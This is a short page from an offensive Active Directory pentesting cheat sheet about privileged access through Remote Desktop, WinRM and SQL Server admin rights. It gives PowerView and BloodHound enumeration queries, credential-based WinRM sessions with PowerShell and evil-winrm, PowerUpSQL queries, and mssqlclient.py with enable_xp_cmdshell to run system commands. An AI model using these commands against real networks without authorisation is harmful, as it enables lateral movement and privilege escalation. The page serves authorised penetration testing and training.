Privileged Access

Remote Desktop

# Enumerating the Remote Desktop Users Group
Get-NetLocalGroupMember -ComputerName MS01 -GroupName "Remote Desktop Users"

WinRM

# Enumerating the Remote Management Users Group
Get-NetLocalGroupMember -ComputerName MS01 -GroupName "Remote Management Users"

# Custom query to find WinRM users
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

Establishing WinRM Session from Windows

$password = ConvertTo-SecureString "pass" -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential ("DOMAIN\eren", $password)
Enter-PSSession -ComputerName DB01 -Credential $cred

ORRR 
# From Linux
evil-winrm -i ip -u eren

SQL Server Admin

# check for SQL Admin Rights 
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2

# hunt for SQL server instances using Powerup.ps1
# Link : <https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet>
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain

# authenticate against the remote SQL server host and run custom queries or operating system commands
Get-SQLQuery -Verbose -Instance "ip,1433" -username "domain\user" -password "SQL1234!" -query 'Select @@version'

ORRR
# From Linux using mssqlclient.py 
mssqlclient.py DOMAIN/USER@ip -windows-auth
enable_xp_cmdshell <-- to run system commands,escalate privs, enumerate more....

PreviousDCSync NextAS-REP Roasting

Last updated 3 years ago